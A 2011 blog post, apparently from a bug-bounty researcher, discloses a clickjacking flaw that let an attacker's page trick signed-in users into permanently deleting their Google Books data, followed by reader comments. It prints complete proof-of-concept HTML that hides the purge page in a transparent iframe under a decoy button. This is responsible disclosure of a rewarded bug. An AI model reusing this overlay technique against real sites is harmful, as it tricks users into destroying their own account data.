Tuesday, 13 September 2011

Remove Google Books with Clickjacking

Google Accounts has options to remove Google Products. One of them was to remove Google Books permanently.


This action was well protected for CSRF using tokens. However it was possible to render this page in an iframe due to absence of clickjacking protections such as Frame Bursting Code or X-FRAME-OPTIONS header.


To carry a successful clickjacking attack, an attacker needs to place a dummy button on top of “OK” button from vulnerable page.


The page presented to victim looks like this.



When an authenticated user browses to the above page hosted on attacker site, the invisible iframe will be loaded with remove Google Books page having proper anti-CSRF tokens in place. When user clicks on “Click” button, he/she actually clicks on “OK” button on vulnerable page and all the reviews, ratings and libraries of that user will be deleted.

This attack needs only one click and works like CSRF.

Edit: Here is the demo code used for this exploit:

<html>
<head>
<style>
button.dummy{position:absolute;top:8px;left:18px;z-index:-10}

#victim {
opacity: 0;
position: absolute;
top: -640px;
left: -55px;
overflow: hidden;
width:800px;
height: 700px;
}
</style>
</head>
<body>
<button type="button" class="dummy">Click</button>
<div id=victim>
<iframe src="http://www.google.com/books?op=purge&continue=http://www.google.com/accounts/EditServices" border=0 scrolling=no width=350 height=900></iframe>
</div>
</body>
</html>


I would like to thanks Google to choosing this bug for reward.

7 comments:

  1. Nice practical example of Click Jacking. Awesome work.

    ReplyDelete
  2. Ok. This is a neat demo for Cross Frame Scripting Attack (XFS). Can you post the demo code that you used to overlay the button.

    ReplyDelete
  3. Thanks @webDEViL

    @p0wnsauc3: The post is updated with demo code.

    ReplyDelete
  4. Nice again :) I need to start looking for Google clickjackings myself as you're getting all the money ;)

    ReplyDelete
  5. Nice Finding Amol...

    so now total reward sum is ??

    ReplyDelete